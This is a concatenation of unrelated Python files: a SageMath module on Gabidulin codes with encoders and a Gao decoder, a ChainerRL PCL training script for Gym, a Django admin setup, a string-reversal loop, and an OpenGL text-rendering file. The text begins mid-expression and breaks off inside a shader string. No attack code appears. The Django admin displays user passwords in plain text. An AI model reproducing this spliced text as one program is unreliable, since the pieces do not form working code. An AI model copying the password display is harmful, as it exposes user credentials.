[base_field.gen()**i for i in range(base_field.degree())][:length] else: if not len(evaluation_points) == length: raise ValueError("the number of evaluation points should be equal to the length of the code") for i in range(length): if not evaluation_points[i] in base_field: raise ValueError("evaluation point does not belong to the 'base field'") basis = self.matrix_form_of_vector(vector(evaluation_points)) if basis.rank() != length: raise ValueError("the evaluation points provided are not linearly independent") self._evaluation_points = evaluation_points self._dimension = dimension def _repr_(self): """ Return a string representation of ``self``. EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq); C [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) """ R = self.base_field() S = self.sub_field() if R and S in Fields(): return "[%s, %s, %s] linear Gabidulin code over GF(%s)/GF(%s)"%(self.length(), self.dimension(), self.minimum_distance(), R.cardinality(), S.cardinality()) else: return "[%s, %s, %s] linear Gabidulin code over %s/%s"%(self.length(), self.dimension(), self.minimum_distance(), R, S) def _latex_(self): """ Return a latex representation of ``self``. EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq); sage: latex(C) [2, 2, 1] \textnormal{ linear Gabidulin code over } \Bold{F}_{2^{4}}/\Bold{F}_{2^{2}} """ return "[%s, %s, %s] \\textnormal{ linear Gabidulin code over } %s/%s"\ % (self.length(), self.dimension() ,self.minimum_distance(), self.base_field()._latex_(), self.sub_field()._latex_()) def __eq__(self, other): """ Tests equality between Gabidulin Code objects. INPUT: - ``other`` -- another Gabidulin Code object OUTPUT: - ``True`` or ``False`` EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C1 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: C2 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: C1.__eq__(C2) True sage: Fqmm = GF(64) sage: C3 = codes.GabidulinCode(Fqmm, 2, 2, Fq) sage: C3.__eq__(C2) False """ return isinstance(other, GabidulinCode) \ and self.base_field() == other.base_field() \ and self.sub_field() == other.sub_field() \ and self.length() == other.length() \ and self.dimension() == other.dimension() \ and self.evaluation_points() == other.evaluation_points() def twisting_homomorphism(self): r""" Return the twisting homomorphism of ``self``. EXAMPLES:: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 5, 3, Fq) sage: C.twisting_homomorphism() Frobenius endomorphism z20 |--> z20^(5^4) on Finite Field in z20 of size 5^20 """ return self._twisting_homomorphism def minimum_distance(self): r""" Return the minimum distance of ``self``. Since Gabidulin Codes are Maximum-Distance-Separable (MDS), this returns ``self.length() - self.dimension() + 1``. EXAMPLES:: sage: Fqm = GF(5^20) sage: Fq = GF(5) sage: C = codes.GabidulinCode(Fqm, 20, 15, Fq) sage: C.minimum_distance() 6 """ return self.length() - self.dimension() + 1 def parity_evaluation_points(self): r""" Return the parity evalution points of ``self``. These form the first row of the parity check matrix of ``self``. EXAMPLES:: sage: C = codes.GabidulinCode(GF(2^10), 5, 2) sage: list(C.parity_check_matrix().row(0)) == C.parity_evaluation_points() #indirect_doctest True """ eval_pts = self.evaluation_points() n = self.length() k = self.dimension() sigma = self.twisting_homomorphism() coefficient_matrix = matrix(self.base_field(), n - 1, n, lambda i,j: (sigma**(-n + k + 1 + i))(eval_pts[j])) solution_space = coefficient_matrix.right_kernel() return list(solution_space.basis()[0]) def dual_code(self): r""" Return the dual code `C^{\perp}` of ``self``, the code `C`, .. MATH:: C^{\perp} = \{ v \in V\ |\ v\cdot c = 0,\ \forall c \in C \}. EXAMPLES:: sage: C = codes.GabidulinCode(GF(2^10), 5, 2) sage: C1 = C.dual_code(); C1 [5, 3, 3] linear Gabidulin code over GF(1024)/GF(2) sage: C == C1.dual_code() True """ return GabidulinCode(self.base_field(), self.length(), self.length() - self.dimension(), self.sub_field(), self.twisting_homomorphism(), self.parity_evaluation_points()) def parity_check_matrix(self): r""" Return the parity check matrix of ``self``. This is the generator matrix of the dual code of ``self``. EXAMPLES:: sage: C = codes.GabidulinCode(GF(2^3), 3, 2) sage: C.parity_check_matrix() [ 1 z3 z3^2 + z3] sage: C.parity_check_matrix() == C.dual_code().generator_matrix() True """ return self.dual_code().generator_matrix() def evaluation_points(self): """ Return the evaluation points of ``self``. EXAMPLES:: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: C.evaluation_points() [1, z20, z20^2, z20^3] """ return self._evaluation_points ####################### encoders ############################### class GabidulinVectorEvaluationEncoder(Encoder): def __init__(self, code): """ This method constructs the vector evaluation encoder for Gabidulin Codes. INPUT: - ``code`` -- the associated code of this encoder. EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E = codes.encoders.GabidulinVectorEvaluationEncoder(C) sage: E Vector evaluation style encoder for [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) Alternatively, we can construct the encoder from ``C`` directly:: sage: E = C.encoder("VectorEvaluation") sage: E Vector evaluation style encoder for [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) TESTS: If the code is not a Gabidulin code, an error is raised: sage: C = codes.HammingCode(GF(4), 2) sage: E = codes.encoders.GabidulinVectorEvaluationEncoder(C) Traceback (most recent call last): ... ValueError: code has to be a Gabidulin code """ if not isinstance(code, GabidulinCode): raise ValueError("code has to be a Gabidulin code") super(GabidulinVectorEvaluationEncoder, self).__init__(code) def _repr_(self): """ Return a string representation of ``self``. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: E = codes.encoders.GabidulinVectorEvaluationEncoder(C); E Vector evaluation style encoder for [4, 4, 1] linear Gabidulin code over GF(95367431640625)/GF(625) """ return "Vector evaluation style encoder for %s" % self.code() def _latex_(self): """ Return a latex representation of ``self``. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: E = codes.encoders.GabidulinVectorEvaluationEncoder(C) sage: latex(E) \textnormal{Vector evaluation style encoder for } [4, 4, 1] \textnormal{ linear Gabidulin code over } \Bold{F}_{5^{20}}/\Bold{F}_{5^{4}} """ return "\\textnormal{Vector evaluation style encoder for } %s" % self.code()._latex_() def __eq__(self, other): """ Tests equality between Gabidulin Generator Matrix Encoder objects. INPUT: - ``other`` -- another Gabidulin Generator Matrix Encoder OUTPUT: - ``True`` or ``False`` EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C1 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E1 = codes.encoders.GabidulinVectorEvaluationEncoder(C1) sage: C2 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E2 = codes.encoders.GabidulinVectorEvaluationEncoder(C2) sage: E1.__eq__(E2) True sage: Fqmm = GF(64) sage: C3 = codes.GabidulinCode(Fqmm, 2, 2, Fq) sage: E3 = codes.encoders.GabidulinVectorEvaluationEncoder(C3) sage: E3.__eq__(E2) False """ return isinstance(other, GabidulinVectorEvaluationEncoder) \ and self.code() == other.code() def generator_matrix(self): """ Return the generator matrix of ``self``. EXAMPLES:: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 3, 3, Fq) sage: list(C.generator_matrix().row(1)) == [C.evaluation_points()[i]**(2**3) for i in range(3)] True """ from functools import reduce C = self.code() eval_pts = C.evaluation_points() sigma = C.twisting_homomorphism() create_matrix_elements = lambda A,k,f: reduce(lambda L,x: [x] + \ list(map(lambda l: list(map(f,l)), L)), [A]*k, []) return matrix(C.base_field(), C.dimension(), C.length(), create_matrix_elements(eval_pts, C.dimension(), sigma)) class GabidulinPolynomialEvaluationEncoder(Encoder): r""" Encoder for Gabidulin codes which uses evaluation of skew polynomials to obtain codewords. Let `C` be a Gabidulin code of length `n` and dimension `k` over some finite field `F = GF(q^m)`. We denote by `\alpha_i` its evaluations points, where `1 \leq i \leq n`. Let `p`, a skew polynomial of degree at most `k-1` in `F[x]`, be the message. The encoding of `m` will be the following codeword: .. MATH:: (p(\alpha_1), \dots, p(\alpha_n)). TESTS:: This module uses the following experimental feature: This test block is here only to trigger the experimental warning so it does not interferes with doctests:: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: S. = Fqm['x', C.twisting_homomorphism()] sage: z9 = Fqm.gen() sage: p = (z9^6 + z9^2 + z9 + 1)*x + z9^7 + z9^5 + z9^4 + z9^2 sage: vector(p.multi_point_evaluation(C.evaluation_points())) doctest:...: FutureWarning: This class/method/function is marked as experimental. It, its functionality or its interface might change without a formal deprecation. See http://trac.sagemath.org/13215 for details. (z9^7 + z9^6 + z9^5 + z9^4 + z9 + 1, z9^6 + z9^5 + z9^3 + z9) EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: E Polynomial evaluation style encoder for [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) Alternatively, we can construct the encoder from ``C`` directly:: sage: E = C.encoder("PolynomialEvaluation") sage: E Polynomial evaluation style encoder for [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) """ def __init__(self, code): r""" INPUT: - ``code`` -- the associated code of this encoder TESTS: If the code is not a Gabidulin code, an error is raised: sage: C = codes.HammingCode(GF(4), 2) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) Traceback (most recent call last): ... ValueError: code has to be a Gabidulin code """ if not isinstance(code, GabidulinCode): raise ValueError("code has to be a Gabidulin code") super(GabidulinPolynomialEvaluationEncoder, self).__init__(code) def _repr_(self): """ Return a string representation of ``self``. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C); E Polynomial evaluation style encoder for [4, 4, 1] linear Gabidulin code over GF(95367431640625)/GF(625) """ return "Polynomial evaluation style encoder for %s" % self.code() def _latex_(self): """ Return a latex representation of ``self``. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: latex(E) \textnormal{Polynomial evaluation style encoder for } [4, 4, 1] \textnormal{ linear Gabidulin code over } \Bold{F}_{5^{20}}/\Bold{F}_{5^{4}} """ return "\\textnormal{Polynomial evaluation style encoder for } %s" % self.code()._latex_() def __eq__(self, other): """ Test equality between Gabidulin Polynomial Evaluation Encoder objects. INPUT: - ``other`` -- another Gabidulin Polynomial Evaluation Encoder OUTPUT: - ``True`` or ``False`` EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C1 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E1 = codes.encoders.GabidulinPolynomialEvaluationEncoder(C1) sage: C2 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E2 = codes.encoders.GabidulinPolynomialEvaluationEncoder(C2) sage: E1.__eq__(E2) True sage: Fqmm = GF(64) sage: C3 = codes.GabidulinCode(Fqmm, 2, 2, Fq) sage: E3 = codes.encoders.GabidulinPolynomialEvaluationEncoder(C3) sage: E3.__eq__(E2) False """ return isinstance(other, GabidulinPolynomialEvaluationEncoder) \ and self.code() == other.code() def message_space(self): r""" Return the message space of the associated code of ``self``. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: E.message_space() Ore Polynomial Ring in x over Finite Field in z20 of size 5^20 twisted by z20 |--> z20^(5^4) """ C = self.code() return C.base_field()['x', C.twisting_homomorphism()] def encode(self, p, form="vector"): """ Transform the polynomial ``p`` into a codeword of :meth:`code`. The output codeword can be represented as a vector or a matrix, depending on the ``form`` input. INPUT: - ``p`` -- a skew polynomial from the message space of ``self`` of degree less than ``self.code().dimension()`` - ``form`` -- type parameter taking strings "vector" or "matrix" as values and converting the output codeword into the respective form (default: "vector") OUTPUT: - a codeword corresponding to `p` in vector or matrix form EXAMPLES: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: S. = Fqm['x', C.twisting_homomorphism()] sage: z9 = Fqm.gen() sage: p = (z9^6 + z9^2 + z9 + 1)*x + z9^7 + z9^5 + z9^4 + z9^2 sage: codeword_vector = E.encode(p, "vector"); codeword_vector (z9^7 + z9^6 + z9^5 + z9^4 + z9 + 1, z9^6 + z9^5 + z9^3 + z9) sage: codeword_matrix = E.encode(p, "matrix"); codeword_matrix [ z3 z3^2 + z3] [ z3 1] [ z3^2 z3^2 + z3 + 1] TESTS: If the skew polynomial, `p`, has degree greater than or equal to the dimension of the code, an error is raised:: sage: t = z9^4*x^2 + z9 sage: codeword_vector = E.encode(t, "vector"); codeword_vector Traceback (most recent call last): ... ValueError: the skew polynomial to encode must have degree at most 1 The skew polynomial, `p`, must belong to the message space of the code. Otherwise, an error is raised:: sage: Fqmm = GF(2^12) sage: S. = Fqmm['x', Fqmm.frobenius_endomorphism(n=3)] sage: q = S.random_element(degree=2) sage: codeword_vector = E.encode(q, "vector"); codeword_vector Traceback (most recent call last): ... ValueError: the message to encode must be in Ore Polynomial Ring in x over Finite Field in z9 of size 2^9 twisted by z9 |--> z9^(2^3) """ C = self.code() M = self.message_space() if p not in M: raise ValueError("the message to encode must be in %s" % M) if p.degree() >= C.dimension(): raise ValueError("the skew polynomial to encode must have degree at most %s" % (C.dimension() - 1)) eval_pts = C.evaluation_points() codeword = p.multi_point_evaluation(eval_pts) if form == "vector": return vector(codeword) elif form == "matrix": return C.matrix_form_of_vector(vector(codeword)) else: return ValueError("the argument 'form' takes only either 'vector' or 'matrix' as valid input") def unencode_nocheck(self, c): """ Return the message corresponding to the codeword ``c``. Use this method with caution: it does not check if ``c`` belongs to the code, and if this is not the case, the output is unspecified. INPUT: - ``c`` -- a codeword of :meth:`code` OUTPUT: - a skew polynomial of degree less than ``self.code().dimension()`` EXAMPLES: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: S. = Fqm['x', C.twisting_homomorphism()] sage: z9 = Fqm.gen() sage: p = (z9^6 + z9^4)*x + z9^2 + z9 sage: codeword_vector = E.encode(p, "vector") sage: E.unencode_nocheck(codeword_vector) (z9^6 + z9^4)*x + z9^2 + z9 """ C = self.code() eval_pts = C.evaluation_points() values = [c[i] for i in range(len(c))] points = [(eval_pts[i], values[i]) for i in range(len(eval_pts))] p = self.message_space().lagrange_polynomial(points) return p ####################### decoders ############################### class GabidulinGaoDecoder(Decoder): def __init__(self, code): r""" Gao style decoder for Gabidulin Codes. INPUT: - ``code`` -- the associated code of this decoder EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: D Gao decoder for [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) Alternatively, we can construct the encoder from ``C`` directly:: sage: D = C.decoder("Gao") sage: D Gao decoder for [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) TESTS: If the code is not a Gabidulin code, an error is raised: sage: C = codes.HammingCode(GF(4), 2) sage: D = codes.decoders.GabidulinGaoDecoder(C) Traceback (most recent call last): ... ValueError: code has to be a Gabidulin code """ if not isinstance(code, GabidulinCode): raise ValueError("code has to be a Gabidulin code") super(GabidulinGaoDecoder, self).__init__(code, code.ambient_space(), "PolynomialEvaluation") def _repr_(self): """ Return a string representation of ``self``. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C); D Gao decoder for [4, 4, 1] linear Gabidulin code over GF(95367431640625)/GF(625) """ return "Gao decoder for %s" % self.code() def _latex_(self): """ Return a latex representation of ``self``. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: latex(D) \textnormal{Gao decoder for } [4, 4, 1] \textnormal{ linear Gabidulin code over } \Bold{F}_{5^{20}}/\Bold{F}_{5^{4}} """ return "\\textnormal{Gao decoder for } %s" % self.code()._latex_() def __eq__(self, other): """ Tests equality between Gabidulin Gao Decoder objects. INPUT: - ``other`` -- another Gabidulin Gao Decoder OUTPUT: - ``True`` or ``False`` EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C1 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: D1 = codes.decoders.GabidulinGaoDecoder(C1) sage: C2 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: D2 = codes.decoders.GabidulinGaoDecoder(C2) sage: D1.__eq__(D2) True sage: Fqmm = GF(64) sage: C3 = codes.GabidulinCode(Fqmm, 2, 2, Fq) sage: D3 = codes.decoders.GabidulinGaoDecoder(C3) sage: D3.__eq__(D2) False """ return isinstance(other, GabidulinGaoDecoder) \ and self.code() == other.code() def _partial_xgcd(self, a, b, d_stop): """ Compute the partial gcd of `a` and `b` using the right linearized extended Euclidean algorithm up to the `d_stop` iterations. This is a private method for internal use only. INPUT: - ``a`` -- a skew polynomial - ``b`` -- another skew polynomial - ``d_stop`` -- the number of iterations for which the algorithm is to be run OUTPUT: - ``r_c`` -- right linearized remainder of `a` and `b` - ``u_c`` -- right linearized quotient of `a` and `b` EXAMPLES: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: S. = Fqm['x', C.twisting_homomorphism()] sage: z9 = Fqm.gen() sage: p = (z9^6 + z9^4)*x + z9^2 + z9 sage: codeword_vector = E.encode(p, "vector") sage: r = D.decode_to_message(codeword_vector) #indirect_doctest sage: r (z9^6 + z9^4)*x + z9^2 + z9 """ S = self.message_space() if (a not in S) or (b not in S): raise ValueError("both the input polynomials must belong to %s" % S) if a.degree() < b.degree(): raise ValueError("degree of first polynomial must be greater than or equal to degree of second polynomial") r_p = a r_c = b u_p = S.zero() u_c = S.one() v_p = u_c v_c = u_p while r_c.degree() >= d_stop: (q, r_c), r_p = r_p.right_quo_rem(r_c), r_c u_c, u_p = u_p - q*u_c, u_c v_c, v_p = v_p - q*v_c, v_c return r_c, u_c def _decode_to_code_and_message(self, r): """ Return the decoded codeword and message (skew polynomial) corresponding to the received codeword `r`. This is a private method for internal use only. INPUT: - ``r`` -- received codeword OUTPUT: - the decoded codeword and decoded message corresponding to the received codeword `r` EXAMPLES: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: S. = Fqm['x', C.twisting_homomorphism()] sage: z9 = Fqm.gen() sage: p = (z9^6 + z9^4)*x + z9^2 + z9 sage: codeword_vector = E.encode(p, "vector") sage: r = D.decode_to_message(codeword_vector) #indirect doctest sage: r (z9^6 + z9^4)*x + z9^2 + z9 """ C = self.code() length = len(r) eval_pts = C.evaluation_points() S = self.message_space() if length == C.dimension() or r in C: return r, self.connected_encoder().unencode_nocheck(r) points = [(eval_pts[i], r[i]) for i in range(len(eval_pts))] #R = S.lagrange_polynomial(eval_pts, list(r)) R = S.lagrange_polynomial(points) r_out, u_out = self._partial_xgcd(S.minimal_vanishing_polynomial(eval_pts), R, (C.length() + C.dimension()) // 2) quo, rem = r_out.left_quo_rem(u_out) if not rem.is_zero(): raise DecodingError("Decoding failed because the number of errors exceeded the decoding radius") if quo not in S: raise DecodingError("Decoding failed because the number of errors exceeded the decoding radius") c = self.connected_encoder().encode(quo) if C.rank_weight_of_vector(c-r) > self.decoding_radius(): raise DecodingError("Decoding failed because the number of errors exceeded the decoding radius") return c, quo def decode_to_code(self, r): """ Return the decoded codeword corresponding to the received word `r`. INPUT: - ``r`` -- received codeword OUTPUT: - the decoded codeword corresponding to the received codeword EXAMPLES: sage: Fqm = GF(3^20) sage: Fq = GF(3) sage: C = codes.GabidulinCode(Fqm, 5, 3, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: S. = Fqm['x', C.twisting_homomorphism()] sage: z20 = Fqm.gen() sage: p = x sage: codeword_vector = E.encode(p, "vector") sage: codeword_vector (1, z20^3, z20^6, z20^9, z20^12) sage: l = list(codeword_vector) sage: l[0] = l[1] #make an error sage: D.decode_to_code(vector(l)) (1, z20^3, z20^6, z20^9, z20^12) """ return self._decode_to_code_and_message(r)[0] def decode_to_message(self, r): """ Return the skew polynomial (message) corresponding to the received word `r`. INPUT: - ``r`` -- received codeword OUTPUT: - the message corresponding to the received codeword EXAMPLES: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: S. = Fqm['x', C.twisting_homomorphism()] sage: z9 = Fqm.gen() sage: p = (z9^6 + z9^4)*x + z9^2 + z9 sage: codeword_vector = E.encode(p, "vector") sage: r = D.decode_to_message(codeword_vector) sage: r (z9^6 + z9^4)*x + z9^2 + z9 """ return self._decode_to_code_and_message(r)[1] def decoding_radius(self): """ Return the decoding radius of the Gabidulin Gao Decoder. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5) sage: C = codes.GabidulinCode(Fqm, 20, 4, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: D.decoding_radius() 8 """ return (self.code().minimum_distance() - 1) // 2 ############################## registration #################################### GabidulinCode._registered_encoders["PolynomialEvaluation"] = GabidulinPolynomialEvaluationEncoder GabidulinCode._registered_encoders["VectorEvaluation"] = GabidulinVectorEvaluationEncoder GabidulinCode._registered_decoders["Gao"] = GabidulinGaoDecoder """An example of training PCL against OpenAI Gym Envs. This script is an example of training a PCL agent against OpenAI Gym envs. Both discrete and continuous action spaces are supported. To solve CartPole-v0, run: python train_pcl_gym.py To solve InvertedPendulum-v1, run: python train_pcl_gym.py --env InvertedPendulum-v1 """ from __future__ import division from __future__ import print_function from __future__ import unicode_literals from __future__ import absolute_import from builtins import * # NOQA from future import standard_library standard_library.install_aliases() import argparse import chainer import gym gym.undo_logger_setup() import gym.wrappers import numpy as np import chainerrl from chainerrl import experiments from chainerrl import misc from chainerrl.optimizers import rmsprop_async def exp_return_of_episode(episode): return np.exp(sum(x['reward'] for x in episode)) def main(): import logging parser = argparse.ArgumentParser() parser.add_argument('--processes', type=int, default=8) parser.add_argument('--gpu', type=int, default=0) parser.add_argument('--env', type=str, default='CartPole-v0') parser.add_argument('--seed', type=int, default=None) parser.add_argument('--outdir', type=str, default=None) parser.add_argument('--batchsize', type=int, default=10) parser.add_argument('--rollout-len', type=int, default=10) parser.add_argument('--n-hidden-channels', type=int, default=100) parser.add_argument('--n-hidden-layers', type=int, default=2) parser.add_argument('--n-times-replay', type=int, default=1) parser.add_argument('--replay-start-size', type=int, default=10000) parser.add_argument('--t-max', type=int, default=None) parser.add_argument('--tau', type=float, default=1e-2) parser.add_argument('--profile', action='store_true') parser.add_argument('--steps', type=int, default=8 * 10 ** 7) parser.add_argument('--eval-interval', type=int, default=10 ** 5) parser.add_argument('--eval-n-runs', type=int, default=10) parser.add_argument('--reward-scale-factor', type=float, default=1e-2) parser.add_argument('--render', action='store_true', default=False) parser.add_argument('--lr', type=float, default=7e-4) parser.add_argument('--demo', action='store_true', default=False) parser.add_argument('--load', type=str, default='') parser.add_argument('--logger-level', type=int, default=logging.DEBUG) parser.add_argument('--monitor', action='store_true') parser.add_argument('--train-async', action='store_true', default=False) parser.add_argument('--prioritized-replay', action='store_true', default=False) parser.add_argument('--disable-online-update', action='store_true', default=False) parser.add_argument('--backprop-future-values', action='store_true', default=True) parser.add_argument('--no-backprop-future-values', action='store_false', dest='backprop_future_values') args = parser.parse_args() logging.basicConfig(level=args.logger_level) if args.seed is not None: misc.set_random_seed(args.seed) args.outdir = experiments.prepare_output_dir(args, args.outdir) def make_env(process_idx, test): env = gym.make(args.env) if args.monitor and process_idx == 0: env = gym.wrappers.Monitor(env, args.outdir) # Scale rewards observed by agents if not test: misc.env_modifiers.make_reward_filtered( env, lambda x: x * args.reward_scale_factor) if args.render and process_idx == 0 and not test: misc.env_modifiers.make_rendered(env) return env sample_env = gym.make(args.env) timestep_limit = sample_env.spec.tags.get( 'wrapper_config.TimeLimit.max_episode_steps') obs_space = sample_env.observation_space action_space = sample_env.action_space # Switch policy types accordingly to action space types if isinstance(action_space, gym.spaces.Box): model = chainerrl.agents.pcl.PCLSeparateModel( pi=chainerrl.policies.FCGaussianPolicy( obs_space.low.size, action_space.low.size, n_hidden_channels=args.n_hidden_channels, n_hidden_layers=args.n_hidden_layers, bound_mean=True, min_action=action_space.low, max_action=action_space.high, var_wscale=1e-3, var_bias=1, var_type='diagonal', ), v=chainerrl.v_functions.FCVFunction( obs_space.low.size, n_hidden_channels=args.n_hidden_channels, n_hidden_layers=args.n_hidden_layers, ) ) else: model = chainerrl.agents.pcl.PCLSeparateModel( pi=chainerrl.policies.FCSoftmaxPolicy( obs_space.low.size, action_space.n, n_hidden_channels=args.n_hidden_channels, n_hidden_layers=args.n_hidden_layers ), v=chainerrl.v_functions.FCVFunction( obs_space.low.size, n_hidden_channels=args.n_hidden_channels, n_hidden_layers=args.n_hidden_layers, ), ) if not args.train_async and args.gpu >= 0: chainer.cuda.get_device(args.gpu).use() model.to_gpu(args.gpu) if args.train_async: opt = rmsprop_async.RMSpropAsync(lr=args.lr, alpha=0.99) else: opt = chainer.optimizers.Adam(alpha=args.lr) opt.setup(model) if args.prioritized_replay: replay_buffer = \ chainerrl.replay_buffer.PrioritizedEpisodicReplayBuffer( capacity=5 * 10 ** 3, uniform_ratio=0.1, default_priority_func=exp_return_of_episode, wait_priority_after_sampling=False, return_sample_weights=False) else: replay_buffer = chainerrl.replay_buffer.EpisodicReplayBuffer( capacity=5 * 10 ** 3) agent = chainerrl.agents.PCL( model, opt, replay_buffer=replay_buffer, t_max=args.t_max, gamma=0.99, tau=args.tau, phi=lambda x: x.astype(np.float32, copy=False), rollout_len=args.rollout_len, n_times_replay=args.n_times_replay, replay_start_size=args.replay_start_size, batchsize=args.batchsize, train_async=args.train_async, disable_online_update=args.disable_online_update, backprop_future_values=args.backprop_future_values, ) if args.load: agent.load(args.load) if args.demo: env = make_env(0, True) eval_stats = experiments.eval_performance( env=env, agent=agent, n_runs=args.eval_n_runs, max_episode_len=timestep_limit) print('n_runs: {} mean: {} median: {} stdev {}'.format( args.eval_n_runs, eval_stats['mean'], eval_stats['median'], eval_stats['stdev'])) else: if args.train_async: experiments.train_agent_async( agent=agent, outdir=args.outdir, processes=args.processes, make_env=make_env, profile=args.profile, steps=args.steps, eval_n_runs=args.eval_n_runs, eval_interval=args.eval_interval, max_episode_len=timestep_limit) else: experiments.train_agent_with_evaluation( agent=agent, env=make_env(0, test=False), eval_env=make_env(0, test=True), outdir=args.outdir, steps=args.steps, eval_n_runs=args.eval_n_runs, eval_interval=args.eval_interval, max_episode_len=timestep_limit) if __name__ == '__main__': main() from .convolutions import * from .pooling import * __version__ = '0.1' 0 from django.contrib import admin from gestionpedidos.models import usuarios, houses # Register your models here. class usuarios_admin(admin.ModelAdmin): list_display = ("name", "email", "password", "city", "country") search_fields = ("name", "email", "city", "country") list_filter = ("country",) class houses_admin(admin.ModelAdmin): list_display = ("city", "description", "price", "image") admin.site.register(usuarios, usuarios_admin) admin.site.register(houses, houses_admin) flag = "y" while flag.lower() == "y": string = input("Enter string to be reversed: ") print(f"The given string after reversing:\n{string[::-1]}\n") flag = input("Reverse more strings? (Y/N): ")""" Class for rendering bitmaps and text in a window with OpenGL """ import os from typing import Any, Optional, Set, Tuple import numpy as np SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__)) FONT: Optional[np.ndarray] = None def _str_to_array(s: str) -> np.ndarray: """ Convert a text string into a numpy array """ max_line_length = max(len(line) for line in s.split("\n")) lines = [] for line in s.split("\n"): lines.append(line + " " * (max_line_length - len(line))) arrs = [] for line in lines: arr = np.frombuffer(line.encode("utf8"), dtype=np.uint8) arrs.append(arr) return np.stack(arrs) def _convert_ascii_to_rgba(arr: np.ndarray, size_px=32) -> np.ndarray: """ Convert an ascii array to an image array using the loaded font """ global FONT if FONT is None: FONT = np.load(os.path.join(SCRIPT_DIR, "font.bin")) charset = FONT[f"{size_px}px"] _, char_height, char_width = charset.shape height, width = arr.shape image = np.ones((height * char_height, width * char_width, 4), dtype=np.uint8) * 255 for y in range(height): for x in range(width): ch = arr[y, x] image[ y * char_height : (y + 1) * char_height, x * char_width : (x + 1) * char_width, 3, ] = charset[ch] return image BITMAP_VERTEX_SHADER = """ #version 330 uniform float in_width; uniform float in_height; in vec2 in_pos; in vec2 in_tex_coord; out vec2 tex_coord; void main() { // convert from screen pixels to normalized device coordinates gl_Position = vec4(in_pos.x / 